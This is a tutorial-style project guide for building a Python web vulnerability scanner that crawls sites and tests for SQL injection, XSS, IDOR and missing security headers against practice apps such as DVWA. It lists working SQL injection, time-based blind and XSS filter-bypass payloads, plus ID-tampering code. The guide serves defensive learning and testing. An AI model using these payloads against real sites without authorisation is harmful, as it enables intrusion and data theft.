โ”‚                     WEB VULNERABILITY SCANNER                        โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
                    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
                    โ”‚   Orchestrator    โ”‚
                    โ”‚   (scanner.py)    โ”‚
                    โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
                    โ”‚ - Load config     โ”‚
                    โ”‚ - Initialize      โ”‚
                    โ”‚ - Coordinate      โ”‚
                    โ”‚ - Generate report โ”‚
                    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
        โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
        โ”‚                     โ”‚                     โ”‚
        โ–ผ                     โ–ผ                     โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚   Crawler     โ”‚    โ”‚   Modules     โ”‚    โ”‚   Reporter    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค    โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค    โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ - Discover    โ”‚    โ”‚ - SQLi        โ”‚    โ”‚ - Format      โ”‚
โ”‚   pages       โ”‚โ”€โ”€โ”€โ–บโ”‚ - XSS         โ”‚โ”€โ”€โ”€โ–บโ”‚   findings    โ”‚
โ”‚ - Extract     โ”‚    โ”‚ - IDOR        โ”‚    โ”‚ - Generate    โ”‚
โ”‚   forms       โ”‚    โ”‚ - Headers     โ”‚    โ”‚   HTML/JSON   โ”‚
โ”‚ - Map attack  โ”‚    โ”‚ - SSRF        โ”‚    โ”‚ - Severity    โ”‚
โ”‚   surface     โ”‚    โ”‚               โ”‚    โ”‚   rating      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Key Data Structures

@dataclass
class CrawlResult:
    url: str
    method: str  # GET, POST
    parameters: List[Parameter]
    forms: List[Form]
    response_code: int

@dataclass
class Parameter:
    name: str
    value: str
    location: str  # query, body, cookie, header
    param_type: str  # string, numeric, email, etc.

@dataclass
class Form:
    action: str
    method: str
    inputs: List[FormInput]

@dataclass
class FormInput:
    name: str
    input_type: str  # text, password, hidden, etc.
    value: Optional[str]

@dataclass
class Vulnerability:
    vuln_type: str  # sqli, xss, idor, etc.
    severity: str  # critical, high, medium, low
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str]
    recommendation: str

Testing Flow

SCANNER WORKFLOW
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

1. CRAWLING PHASE
   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
   โ”‚  Start URL: https://target.com                              โ”‚
   โ”‚                                                             โ”‚
   โ”‚  โ†’ Visit page                                               โ”‚
   โ”‚  โ†’ Extract links: /login, /products, /about                 โ”‚
   โ”‚  โ†’ Extract forms: login form, search form                   โ”‚
   โ”‚  โ†’ Queue new URLs for crawling                              โ”‚
   โ”‚  โ†’ Repeat until all URLs visited                            โ”‚
   โ”‚                                                             โ”‚
   โ”‚  Result: Attack surface map                                 โ”‚
   โ”‚    - 50 unique pages                                        โ”‚
   โ”‚    - 12 forms                                               โ”‚
   โ”‚    - 85 parameters                                          โ”‚
   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

2. TESTING PHASE
   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
   โ”‚  For each parameter in attack surface:                      โ”‚
   โ”‚                                                             โ”‚
   โ”‚  SQLi Module:                                               โ”‚
   โ”‚    - Inject ' and " โ†’ Check for SQL errors                 โ”‚
   โ”‚    - Try boolean payloads โ†’ Compare responses              โ”‚
   โ”‚    - Try time-based โ†’ Measure delays                       โ”‚
   โ”‚                                                             โ”‚
   โ”‚  XSS Module:                                                โ”‚
   โ”‚    - Inject <script>alert(1)</script>                      โ”‚
   โ”‚    - Check if payload appears in response                  โ”‚
   โ”‚    - Test multiple contexts                                 โ”‚
   โ”‚                                                             โ”‚
   โ”‚  IDOR Module:                                               โ”‚
   โ”‚    - If numeric ID found, try adjacent values              โ”‚
   โ”‚    - Compare response content                               โ”‚
   โ”‚                                                             โ”‚
   โ”‚  ...repeat for each module...                              โ”‚
   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

3. REPORTING PHASE
   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
   โ”‚  Aggregate all findings:                                    โ”‚
   โ”‚    - Critical: 2 SQLi vulnerabilities                       โ”‚
   โ”‚    - High: 5 XSS vulnerabilities                           โ”‚
   โ”‚    - Medium: 3 IDOR issues                                  โ”‚
   โ”‚    - Low: 8 missing security headers                        โ”‚
   โ”‚                                                             โ”‚
   โ”‚  Generate report with:                                      โ”‚
   โ”‚    - Executive summary                                      โ”‚
   โ”‚    - Technical details for each finding                    โ”‚
   โ”‚    - Reproduction steps                                     โ”‚
   โ”‚    - Recommendations                                        โ”‚
   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Web Vulnerability Scanner Workflow - Three Phase Process


Phased Implementation Guide

Phase 1: HTTP Client and Crawler Foundation (Days 1-3)

Goal: Crawl a simple website and extract all forms

Implementation steps:

  1. Create HTTP session wrapper: ```python import requests from urllib.parse import urljoin, urlparse

class WebSession: def init(self, base_url: str, timeout: int = 10): self.session = requests.Session() self.base_url = base_url self.timeout = timeout self.visited = set()

def get(self, url: str) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.get(full_url, timeout=self.timeout)

def post(self, url: str, data: dict) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.post(full_url, data=data, timeout=self.timeout) ```
  1. Implement HTML parser for links and forms: ```python from bs4 import BeautifulSoup

def extract_links(html: str, base_url: str) -> List[str]: soup = BeautifulSoup(html, โ€˜html.parserโ€™) links = [] for a in soup.find_all(โ€˜aโ€™, href=True): link = urljoin(base_url, a[โ€˜hrefโ€™]) if urlparse(link).netloc == urlparse(base_url).netloc: links.append(link) return links

def extract_forms(html: str, base_url: str) -> List[Form]: soup = BeautifulSoup(html, โ€˜html.parserโ€™) forms = [] for form in soup.find_all(โ€˜formโ€™): action = urljoin(base_url, form.get(โ€˜actionโ€™, โ€˜โ€™)) method = form.get(โ€˜methodโ€™, โ€˜getโ€™).upper() inputs = [] for inp in form.find_all([โ€˜inputโ€™, โ€˜textareaโ€™, โ€˜selectโ€™]): inputs.append(FormInput( name=inp.get(โ€˜nameโ€™, โ€˜โ€™), input_type=inp.get(โ€˜typeโ€™, โ€˜textโ€™), value=inp.get(โ€˜valueโ€™, โ€˜โ€™) )) forms.append(Form(action, method, inputs)) return forms


3. Implement BFS crawler:
```python
from collections import deque

def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
    session = WebSession(start_url)
    queue = deque([start_url])
    results = []

    while queue and len(results) < max_pages:
        url = queue.popleft()
        if url in session.visited:
            continue
        session.visited.add(url)

        try:
            response = session.get(url)
            links = extract_links(response.text, url)
            forms = extract_forms(response.text, url)
            params = extract_url_params(url)

            results.append(CrawlResult(url, 'GET', params, forms, response.status_code))

            for link in links:
                if link not in session.visited:
                    queue.append(link)
        except Exception as e:
            print(f"Error crawling {url}: {e}")

    return results

Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms

Phase 2: SQL Injection Module (Days 3-6)

Goal: Detect SQL injection in any parameter

Implementation steps:

  1. Create payload injection framework:
    def inject_parameter(session: WebSession, url: str, param: str, payload: str, method: str = 'GET') -> requests.Response:
     """Inject payload into specific parameter"""
     if method == 'GET':
         # Modify URL query string
         parsed = urlparse(url)
         params = dict(parse_qs(parsed.query))
         params[param] = [payload]
         new_query = urlencode(params, doseq=True)
         new_url = parsed._replace(query=new_query).geturl()
         return session.get(new_url)
     else:
         # Modify POST body
         return session.post(url, data={param: payload})
    
  2. Implement error-based detection: ```python SQL_ERRORS = [ โ€œyou have an error in your sql syntaxโ€, โ€œwarning: mysqlโ€, โ€œunclosed quotation markโ€, โ€œquoted string not properly terminatedโ€, โ€œsqlexceptionโ€, โ€œmicrosoft ole db provider for sql serverโ€, โ€œpostgresql query failedโ€, โ€œsyntax error at or nearโ€, ]

def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: payloads = [โ€โ€™โ€, โ€˜โ€โ€™, โ€œโ€™ OR โ€˜1โ€™=โ€™1โ€, โ€œ1โ€™ AND โ€˜1โ€™=โ€™1โ€]

for payload in payloads:
    response = inject_parameter(session, url, param, payload)
    for error in SQL_ERRORS:
        if error.lower() in response.text.lower():
            return Vulnerability(
                vuln_type="SQL Injection (Error-based)",
                severity="critical",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"SQL error found: {error}",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe SQL error in response"
                ],
                recommendation="Use parameterized queries/prepared statements"
            )
return None ```
  1. Implement time-based detection: ```python import time

def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: delay = 5 # seconds payloads = [ fโ€โ€™ AND SLEEP({delay})โ€“โ€, fโ€โ€™; WAITFOR DELAY โ€˜0:0:{delay}โ€™โ€“โ€, fโ€โ€™ AND pg_sleep({delay})โ€“โ€ ]

# First, get baseline response time
start = time.time()
session.get(url)
baseline = time.time() - start

for payload in payloads:
    start = time.time()
    inject_parameter(session, url, param, payload)
    elapsed = time.time() - start

    if elapsed >= baseline + delay - 0.5:  # Allow 0.5s tolerance
        return Vulnerability(
            vuln_type="SQL Injection (Time-based Blind)",
            severity="critical",
            url=url,
            parameter=param,
            payload=payload,
            evidence=f"Response delayed by {elapsed:.1f}s (expected {delay}s)",
            reproduction_steps=[...],
            recommendation="Use parameterized queries/prepared statements"
        )
return None ```

Verification: Detect SQLi in DVWA with security level โ€œlowโ€

Phase 3: XSS Module (Days 6-9)

Goal: Detect reflected XSS vulnerabilities

Implementation steps:

  1. Create XSS payload generator: ```python XSS_PAYLOADS = [ โ€˜โ€™, โ€˜<img src=x onerror=alert(1)>โ€™, โ€˜โ€>โ€™, โ€œโ€˜-alert(1)-โ€˜โ€, โ€˜<svg onload=alert(1)>โ€™, ]

Random marker to detect reflection

def generate_xss_marker(): return fโ€xss{random.randint(10000, 99999)}โ€


2. Implement reflection detection:
```python
def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
    vulnerabilities = []

    for payload in XSS_PAYLOADS:
        response = inject_parameter(session, url, param, payload)

        # Check if payload is reflected unencoded
        if payload in response.text:
            # Determine context
            context = determine_xss_context(response.text, payload)

            vulnerabilities.append(Vulnerability(
                vuln_type=f"Reflected XSS ({context})",
                severity="high",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Payload reflected in {context} context",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe JavaScript execution"
                ],
                recommendation="Encode output based on context (HTML, JS, URL)"
            ))
            break  # Found XSS, no need to test more payloads

    return vulnerabilities

def determine_xss_context(html: str, payload: str) -> str:
    """Determine where payload landed in HTML"""
    soup = BeautifulSoup(html, 'html.parser')

    # Check if in script tag
    for script in soup.find_all('script'):
        if payload in script.text:
            return "JavaScript"

    # Check if in attribute
    for tag in soup.find_all():
        for attr, value in tag.attrs.items():
            if isinstance(value, str) and payload in value:
                return f"Attribute ({attr})"

    return "HTML body"
  1. Add filter bypass payloads:
    XSS_BYPASS_PAYLOADS = [
     # Case variation
     '<ScRiPt>alert(1)</ScRiPt>',
     # Event handlers
     '<img src=x onerror=alert(1)>',
     '<body onload=alert(1)>',
     # Unicode encoding
     '<script>alert\u0028\u0031\u0029</script>',
     # Double encoding
     '%253Cscript%253Ealert(1)%253C/script%253E',
    ]
    

Verification: Detect XSS in DVWA and OWASP WebGoat

Phase 4: Security Headers and Misconfig Detection (Days 9-11)

Goal: Check for missing security headers and misconfigurations

Implementation steps:

  1. Security headers analyzer: ```python SECURITY_HEADERS = { โ€˜Strict-Transport-Securityโ€™: { โ€˜severityโ€™: โ€˜mediumโ€™, โ€˜recommendationโ€™: โ€˜Add HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomainsโ€™ }, โ€˜Content-Security-Policyโ€™: { โ€˜severityโ€™: โ€˜mediumโ€™, โ€˜recommendationโ€™: โ€˜Implement Content Security Policy to prevent XSSโ€™ }, โ€˜X-Content-Type-Optionsโ€™: { โ€˜severityโ€™: โ€˜lowโ€™, โ€˜recommendationโ€™: โ€˜Add X-Content-Type-Options: nosniffโ€™ }, โ€˜X-Frame-Optionsโ€™: { โ€˜severityโ€™: โ€˜mediumโ€™, โ€˜recommendationโ€™: โ€˜Add X-Frame-Options: DENY or SAMEORIGINโ€™ }, โ€˜X-XSS-Protectionโ€™: { โ€˜severityโ€™: โ€˜lowโ€™, โ€˜recommendationโ€™: โ€˜Add X-XSS-Protection: 1; mode=blockโ€™ } }

def check_security_headers(response: requests.Response) -> List[Vulnerability]: vulnerabilities = []

for header, info in SECURITY_HEADERS.items():
    if header not in response.headers:
        vulnerabilities.append(Vulnerability(
            vuln_type=f"Missing Security Header: {header}",
            severity=info['severity'],
            url=response.url,
            parameter="N/A",
            payload="N/A",
            evidence=f"Header {header} not present in response",
            reproduction_steps=[
                f"1. Request {response.url}",
                f"2. Inspect response headers",
                f"3. Note absence of {header}"
            ],
            recommendation=info['recommendation']
        ))

# Check for information disclosure
for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
    if header in response.headers:
        vulnerabilities.append(Vulnerability(
            vuln_type=f"Information Disclosure: {header}",
            severity='low',
            url=response.url,
            parameter="N/A",
            payload="N/A",
            evidence=f"{header}: {response.headers[header]}",
            reproduction_steps=[...],
            recommendation=f"Remove or genericize {header} header"
        ))

return vulnerabilities ```
  1. Directory listing detection:
    def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]:
     common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/']
     vulnerabilities = []
    
     for directory in common_dirs:
         url = urljoin(base_url, directory)
         response = session.get(url)
    
         if response.status_code == 200:
             if 'Index of' in response.text or 'Directory listing' in response.text:
                 vulnerabilities.append(Vulnerability(
                     vuln_type="Directory Listing Enabled",
                     severity="low",
                     url=url,
                     parameter="N/A",
                     payload="N/A",
                     evidence="Directory contents visible",
                     reproduction_steps=[f"Navigate to {url}"],
                     recommendation="Disable directory listing in web server config"
                 ))
    
     return vulnerabilities
    

Phase 5: IDOR and Access Control (Days 11-13)

Goal: Detect insecure direct object references

Implementation steps:

  1. Identify numeric parameters:
    def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]:
     """Find all numeric ID parameters"""
     id_params = []
    
     for result in crawl_results:
         for param in result.parameters:
             # Check if value is numeric
             if param.value.isdigit():
                 id_params.append((result.url, param.name, param.value))
    
     return id_params
    
  2. Test for IDOR: ```python def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]: โ€œ"โ€Test if changing ID returns different userโ€™s dataโ€โ€โ€

    # Get original response original_response = session.get(url)

    # Try adjacent IDs test_ids = [ str(int(original_id) + 1), str(int(original_id) - 1), str(int(original_id) * 2), ]

    for test_id in test_ids: modified_url = url.replace(fโ€{param}={original_id}โ€, fโ€{param}={test_id}โ€) test_response = session.get(modified_url)

     # If we get a 200 with different content, potential IDOR
     if test_response.status_code == 200:
         if test_response.text != original_response.text:
             # Further analysis: does it contain PII-like data?
             if contains_pii_indicators(test_response.text):
                 return Vulnerability(
                     vuln_type="Insecure Direct Object Reference (IDOR)",
                     severity="high",
                     url=url,
                     parameter=param,
                     payload=f"Changed {original_id} to {test_id}",
                     evidence="Different data returned for modified ID",
                     reproduction_steps=[
                         f"1. Request original: {url}",
                         f"2. Modify {param} from {original_id} to {test_id}",
                         f"3. Observe different user data returned"
                     ],
                     recommendation="Implement proper authorization checks"
                 )  return None
    

def contains_pii_indicators(text: str) -> bool: โ€œ"โ€Check if response might contain personal dataโ€โ€โ€ indicators = [โ€˜emailโ€™, โ€˜phoneโ€™, โ€˜addressโ€™, โ€˜ssnโ€™, โ€˜passwordโ€™, โ€˜creditโ€™, โ€˜accountโ€™] return any(ind in text.lower() for ind in indicators)


### Phase 6: Reporting and Integration (Days 13-14)

**Goal**: Generate professional vulnerability reports

**Implementation steps**:

1. Report generator:
```python
from jinja2 import Template

def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
    template = Template('''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerability Scan Report - {{ target }}</title>
        <style>
            .critical { background-color: #ff4444; color: white; }
            .high { background-color: #ff8800; color: white; }
            .medium { background-color: #ffbb33; }
            .low { background-color: #99cc00; }
            .finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
        </style>
    </head>
    <body>
        <h1>Vulnerability Scan Report</h1>
        <h2>Target: {{ target }}</h2>
        <h2>Scan Date: {{ scan_date }}</h2>

        <h3>Summary</h3>
        <ul>
            <li class="critical">Critical: {{ critical_count }}</li>
            <li class="high">High: {{ high_count }}</li>
            <li class="medium">Medium: {{ medium_count }}</li>
            <li class="low">Low: {{ low_count }}</li>
        </ul>

        <h3>Findings</h3>
        {% for vuln in vulnerabilities %}
        <div class="finding {{ vuln.severity }}">
            <h4>{{ vuln.vuln_type }}</h4>
            <p><strong>URL:</strong> {{ vuln.url }}</p>
            <p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
            <p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
            <p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
            <p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
        </div>
        {% endfor %}
    </body>
    </html>
    ''')

    return template.render(
        target=target,
        scan_date=datetime.now().isoformat(),
        vulnerabilities=vulnerabilities,
        critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
        high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
        medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
        low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
    )
  1. JSON export for tool integration:
    def export_json(vulnerabilities: List[Vulnerability], filepath: str):
     data = {
         'scan_date': datetime.now().isoformat(),
         'total_findings': len(vulnerabilities),
         'findings': [asdict(v) for v in vulnerabilities]
     }
     with open(filepath, 'w') as f:
         json.dump(data, f, indent=2)
    

Testing Strategy

Testing Against Intentionally Vulnerable Applications

  1. DVWA (Damn Vulnerable Web Application)
    • Test at โ€œLowโ€ security level first
    • Progress through Medium and High
    • Your scanner should find SQLi and XSS at Low
  2. OWASP WebGoat
    • Structured lessons for each vulnerability type
    • Verify your scanner finds the intended vulnerabilities
  3. OWASP Juice Shop
    • Modern JavaScript-heavy application
    • Tests your crawlerโ€™s ability to handle SPAs

Unit Testing Payloads

def test_sqli_payloads_detected():
    # Test against known vulnerable responses
    vulnerable_response = "You have an error in your SQL syntax"
    assert is_sqli_error(vulnerable_response) == True

    clean_response = "No products found"
    assert is_sqli_error(clean_response) == False

def test_xss_reflection_detection():
    html = '<input value="<script>alert(1)</script>">'
    assert detect_xss_reflection(html, '<script>alert(1)</script>') == True

Common Pitfalls and Debugging

1. โ€œFalse positives everywhereโ€

Problem: Scanner reports vulnerabilities that arenโ€™t real

Solutions:

  • Verify by actually exploiting (does payload execute?)
  • Add confidence scoring
  • Require multiple indicators before reporting
  • Filter out honeypot/WAF responses

2. โ€œMissing obvious vulnerabilitiesโ€

Problem: Known vulnerable app, scanner finds nothing

Debug steps:

  1. Is the crawler finding the vulnerable pages?
  2. Is the parameter being tested?
  3. Check if WAF is blocking payloads
  4. Try different payload encodings

3. โ€œCrawler goes off-site or loops foreverโ€

Problem: Crawler follows external links or revisits pages

Solutions:

  • Strict domain checking
  • Track visited URLs in a set
  • Set maximum crawl depth
  • Implement timeout per page

4. โ€œXSS not detected even when payload reflectsโ€

Problem: Payload in response but not marked as XSS

Debug steps:

  1. Is response HTML or JSON?
  2. Is payload HTML-encoded in response?
  3. Check if context detection is working

Extensions and Challenges

Beginner Extensions

  1. Add more payloads: Load from external files
  2. Progress reporting: Show real-time scan progress
  3. Proxy support: Route through Burp Suite

Intermediate Extensions

  1. JavaScript rendering: Use Selenium for SPAs
  2. CSRF detection: Check for missing tokens
  3. Session handling: Test with authenticated sessions

Advanced Extensions

  1. WAF bypass payloads: Encoding and obfuscation
  2. API fuzzing: REST/GraphQL vulnerability testing
  3. SSRF detection: With callback server
  4. Stored XSS: Re-check pages for persisted payloads

Real-World Connections

Commercial Scanners

Your project is a simplified version of:

  • Burp Suite Pro - Industry standard web scanner
  • OWASP ZAP - Open source alternative
  • Nuclei - Template-based vulnerability scanner

After this project, study how these tools workโ€”theyโ€™re built on the same concepts but with years of refinement.

Bug Bounty Application

These skills directly apply to bug bounty:

  • Subdomain enumeration โ†’ More attack surface
  • Automated scanning โ†’ Find low-hanging fruit
  • Manual verification โ†’ Avoid duplicate reports
  • Report writing โ†’ Get paid faster

Self-Assessment Checklist

Core Functionality

  • Crawler discovers all pages and forms
  • SQLi detection works (error-based and time-based)
  • XSS detection works (reflected)
  • Security headers are checked
  • HTML report is generated

Code Quality

  • Modular design (can add new modules easily)
  • Error handling (doesnโ€™t crash on edge cases)
  • Configuration options (timeout, threads, etc.)
  • CLI with โ€“help

Understanding

  • Can explain how SQL injection works at query level
  • Understand difference between XSS contexts
  • Know why parameterized queries prevent SQLi
  • Understand OWASP Top 10 categories

Validation

  • Finds vulnerabilities in DVWA (low security)
  • Minimal false positives on clean application
  • Report is professional quality

Resources

Primary Reading

  • โ€œBug Bounty Bootcampโ€ by Vickie Li - Chapters 6-12
  • โ€œThe Web Application Hackerโ€™s Handbookโ€ by Stuttard & Pinto
  • โ€œHTTP: The Definitive Guideโ€ by David Gourley

Online Resources

Practice Environments

  • DVWA - docker run -p 80:80 vulnerables/web-dvwa
  • OWASP WebGoat - docker run -p 8080:8080 webgoat/webgoat
  • OWASP Juice Shop - docker run -p 3000:3000 bkimminich/juice-shop

This project is part of the Ethical Hacking & Penetration Testing learning path.